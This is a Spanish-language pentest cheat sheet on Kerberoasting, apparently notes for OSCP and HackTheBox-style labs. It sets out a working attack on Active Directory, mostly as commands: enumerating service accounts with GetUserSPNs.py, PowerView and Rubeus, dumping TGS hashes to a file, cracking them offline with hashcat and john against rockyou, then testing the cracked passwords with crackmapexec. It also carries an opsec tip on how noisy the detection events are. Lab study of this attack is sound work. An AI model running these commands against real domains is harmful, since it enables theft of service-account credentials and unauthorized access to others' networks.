Saltar a contenido

Kerberoasting

[!danger] CRITICALITY: HIGH Este es EL ataque más común en Active Directory para escalar de usuario raso a credenciales crackeables. Requisito: Un usuario de dominio válido (incluso con privilegios mínimos).

1. Concepto

Solicitas un Ticket de Servicio (TGS) para un SPN (Service Principal Name). El DC te devuelve un ticket encriptado con el hash NTLM de la cuenta de servicio. Como recibes ese ticket en tu máquina, puedes intentar crackearlo offline.

2. Enumeration (Finding Targets)

Busca cuentas de usuario que tengan configurado un SPN.

Herramienta: GetUserSPNs.py (de Impacket) 

# Desde Kali
# Sintaxis: domain/user:password
GetUserSPNs.py htb.local/svc_user:password123 -dc-ip 10.10.10.10 -request

Herramienta: PowerView.ps1 

# Cargar módulo
Import-Module .\PowerView.ps1

# Listar usuarios con SPN
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname

Herramienta: Rubeus.exe 

# Kerberoast y mostrar estadísticas (sin dumpear aun)
.\Rubeus.exe kerberoast /stats

3. Exploitation (The Attack)

Obtener el hash formateado para John/Hashcat.

El comando GetUserSPNs.py con el flag -request ya te escupe el hash listo. 

GetUserSPNs.py htb.local/juan:P@ssword! -dc-ip 10.10.10.10 -request -outputfile hashes.kerberoast

Usando Rubeus para solicitar el ticket y extraer el hash. 

# /nowrap para facilitar copiado
.\Rubeus.exe kerberoast /nowrap /outfile:hashes.kerberoast

4. Cracking (Offline)

Lleva el archivo hashes.kerberoast a tu Kali/Host potente.

Modo: 13100 (Type 23 TGS-REP) 

hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt --force


john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast

5. Troubleshooting / Common Errors

[!warning] Clock Skew Detected Causa: La hora de tu Kali difiere de la del DC por más de 5 minutos. Kerberos falla. Solución: Sincroniza tu reloj. ntpdate <IP_DC> o rdate -n <IP_DC>

[!failure] "KRB_AP_ERR_SKEW" Mismo problema de reloj. En Windows víctima no suele pasar, pero desde Kali sí.

[!tip] Opsec Kerberoasting genera eventos 4769 (Ticket Requested) en el DC. Es ruidoso si monitorizan SPNs inusuales, pero en OSCP da igual.

6. Next Steps

  • Si crackeas la password -> Check Admin Access!
  • crackmapexec smb 10.10.10.10 -u "ServiceUser" -p "CrackedPassword"
  • Si no es Admin, revisa si tiene acceso a otros shares.